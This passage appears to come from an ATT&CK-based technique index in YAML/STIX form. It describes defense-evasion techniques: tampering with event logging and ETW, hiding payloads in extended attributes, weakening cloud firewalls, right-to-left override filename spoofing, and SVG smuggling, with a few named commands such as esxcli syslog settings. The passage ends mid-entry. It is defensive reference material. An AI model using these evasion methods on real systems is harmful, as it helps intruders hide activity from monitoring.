Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Rob Smith - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS - Linux - ESXi x_mitre_version: '1.5' identifier: T1562.006 atomic_tests: [] T1564.014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--762e6f29-a62f-4d96-91ed-d0073181431f created: '2025-03-27T19:40:00.716Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/014 external_id: T1564.014 - source_name: Establishing persistence using extended attributes on Linux description: Irem Kuyucu. (2024, August 6). Establishing persistence using extended attributes on Linux. Retrieved March 27, 2025. url: https://kernal.eu/posts/linux-xattr-persistence/ - source_name: Low GroupIB xattrs nov 2024 description: 'Sharmine Low. (2024, November 13). Stealthy Attributes of Lazarus APT Group: Evading Detection with Extended Attributes. Retrieved March 27, 2025.' url: https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-09-17T17:58:26.729Z' name: Extended Attributes description: |- Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux) An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Sharmine Low, Group-IB - Rouven Bissinger (SySS GmbH) - RoseSecurity x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' atomic_tests: [] T1562.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c created: '2020-06-24T16:55:46.243Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/007 external_id: T1562.007 - source_name: Expel IO Evil in AWS description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. url: https://expel.io/blog/finding-evil-in-aws/ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022 description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.' url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:58.515Z' name: Disable or Modify Cloud Firewall description: "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Expel - Arun Seelagan, CISA x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.3' atomic_tests: [] T1036.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69 created: '2020-02-10T19:55:29.385Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/002 external_id: T1036.002 - source_name: Trend Micro PLEAD RTLO description: Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019. url: https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/ - source_name: Kaspersky RTLO Cyber Crime description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019. url: https://securelist.com/zero-day-vulnerability-in-telegram/83800/ - source_name: Infosecinstitute RTLO Technique description: Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019. url: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:58.683Z' name: Right-to-Left Override description: |- Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique) Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' atomic_tests: [] T1027.017: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--78b9e70d-1605-459c-b23d-e3a25036968c created: '2025-03-25T15:31:09.697Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/017 external_id: T1027.017 - source_name: Talos SVG Smuggling 2022 description: Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. Retrieved March 25, 2025. url: https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/ - source_name: Trustwave SVG Smuggling 2025 description: 'Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.' url: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pixel-perfect-trap-the-surge-of-svg-borne-phishing-attacks/ - source_name: Bleeping Computer SVG Smuggling 2024 description: Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025. url: https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/ - source_name: Cofense SVG Smuggling 2024 description: Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025. url: https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:43.263Z' name: SVG Smuggling description: "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `